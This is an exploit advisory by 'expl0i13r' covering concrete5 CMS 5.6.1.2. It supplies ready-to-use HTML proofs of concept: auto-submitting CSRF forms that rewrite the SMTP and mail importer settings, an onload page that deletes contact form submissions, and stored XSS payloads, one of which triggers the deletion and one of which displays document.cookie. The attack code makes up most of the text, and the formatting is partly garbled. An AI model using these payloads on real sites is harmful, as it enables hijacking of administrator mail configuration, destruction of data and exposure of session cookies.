=============================================================
__ _______ __ ____
\ \ //||/ _ \(_)/_ ||___ \
___ \ V / _ __ ||||||_ || __)|_ __
/ _ \ ><|'_ \| | | | | | | || ||__ <| '__||__//. \||_)|||||_||||||___)|||
\___|/_/ \_\ |.__/|_|\___/|_||_||____/|_||||_|blackpentesters.blogspot.com
=============================================================############################################################################################ Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities] ## Date: [2013-6-9] ## Exploit Author: [expl0i13r] ## Vendor Homepage: [http://www.concrete5.org/] ## Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/] ## Version: [5.6.1.2] # # Goole Dork: [Built with concrete5 - an open source CMS] ## Tested on: [Windows] ## Contact: expl0i13r@gmail.com ############################################################################################
Summary:========1. CSRF (Modify SMTP Settings)2. CSRF (Modify Mail Importers Settings)3. CSRF (Delete Form Results)4. Stored XSS
1. CSRF (Modify SMTP Settings):================================
concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities one of which allow an attacker
to modify "SMTP Settings"and"Send Mail Method" available at below URL :
Affected URL:--------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update it, when Victim loads this page
----------------------------------------------------------------------------------------<html><head><script type="text/javascript" language="javascript">
function submitform(){
document.getElementById('myForm').submit();}</script></head><body><form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/"class="form-horizontal"id="mail-settings-form" original-class="form-horizontal"><inputtype="radio" name="MAIL_SEND_METHOD"id="MAIL_SEND_METHOD2" value="SMTP"class="ccm-input-radio" checked><inputid="MAIL_SEND_METHOD_SMTP_SERVER"type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1"class="ccm-input-text"><inputid="MAIL_SEND_METHOD_SMTP_USERNAME"type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r"class="ccm-input-text"><inputid="MAIL_SEND_METHOD_SMTP_PASSWORD"type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r"class="ccm-input-text"><select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION"id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL"class="ccm-input-select"><option value="">None</option><option value="SSL" selected="selected">SSL</option><option value="TLS">TLS</option></select><inputid="MAIL_SEND_METHOD_SMTP_PORT"type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value=""class="ccm-input-text"></form><script type="text/javascript" language="javascript">
document.myForm.submit()</script></body></html>2. CSRF (Modify Mail Importer Settings)=========================================
Below code exploits CSRF vulnerability which allows attacker to Edit and update "Importer Settings" details.
Affected URL :---------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update them, when Victim loads this page
----------------------------------------------------------------------------------------<html><head><script type="text/javascript" language="javascript">
function submitform(){
document.getElementById('myForm').submit();}</script></head><body><form name ="myForm" method="post"id="mail-importer-form"class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal"><inputtype="hidden" name="miID"id="miID" value="1"><inputid="miEmail"type="text" name="miEmail" value="exploiter"><inputid="miServer"type="text" name="miServer" value="127.0.0.1"class="ccm-input-text"><inputid="miUsername"type="text" name="miUsername" value=""class="ccm-input-text"><inputid="miPassword"type="text" name="miPassword" value=""class="ccm-input-text"><inputid="miPort"type="text" name="miPort" value="8080"class="ccm-input-text"><select name="miEncryption"id="miEncryption" ccm-passed-value=""class="ccm-input-select"><option value="" selected="selected">None</option></select><select name="miIsEnabled"id="miIsEnabled" ccm-passed-value="1"class="ccm-input-select"><option value="1"selected="selected">Yes</option></select><select name="miConnectionMethod"id="miConnectionMethod" ccm-passed-value="POP"class="ccm-input-select"><option value="POP" selected="selected">POP</option></select><script type="text/javascript" language="javascript">
document.myForm.submit()</script></body></html>3. CSRF (Delete Form Results)===============================
Each Submissions available at "REPORTS">"Form Results" page has static "qsID" assigned, using which attacker can delete submissions.
Ex.---
When we install this CMS,"Contact Us" form by default available at URL : http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/
For above "Contact Form", qsID in my caseis"1370626098", which can be found at url:--------------------------------------------------------------------------------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/--------------------------------------------------------------------------------------<a href="https://www.exploit-db.com/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers"class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>------------------------------------------------------------------------------------------------------
In order to exploit this CSRF, attacker must have "qsID" values,for which attacker needs to have at least Limited access to CMS.
Steps:------1. Attacker logs in to CMS
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"3. Gets Static "qsID" value from source code
4. Use "qsID" to create below CSRF exploit
Code:-------<html><head><script>
function delete(){# Delete Submissins "Contact Us" page
window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers")}</script></head><body onload="delete()"></body></html>4. Multiple Stored XSS
=======================
concrete5 CMS also suffers from Stored XSS vulnerability, which can be used to "Delete Form Results"
everytime page is loaded.
Stored XSS-1============
URL:----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/
Vulnerable Parameter:----------------------<inputtype="text" name="gName"class="span6" value=""id="acpro_inp2">
XSS-CSRF Payload:------------------"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>
Stored XSS-2:=============
URL:-----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/
Vulnerable Parameter:----------------------<inputid="asName"type="text" name="asName" value=""class="ccm-input-text">
Payload:---------
"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>################################### eXpl0i13r## ------------------------------ ##|blackpentesters.blogspot.com |##|infotech-knowledge.blogspot.in|## ------------------------------ ###################################
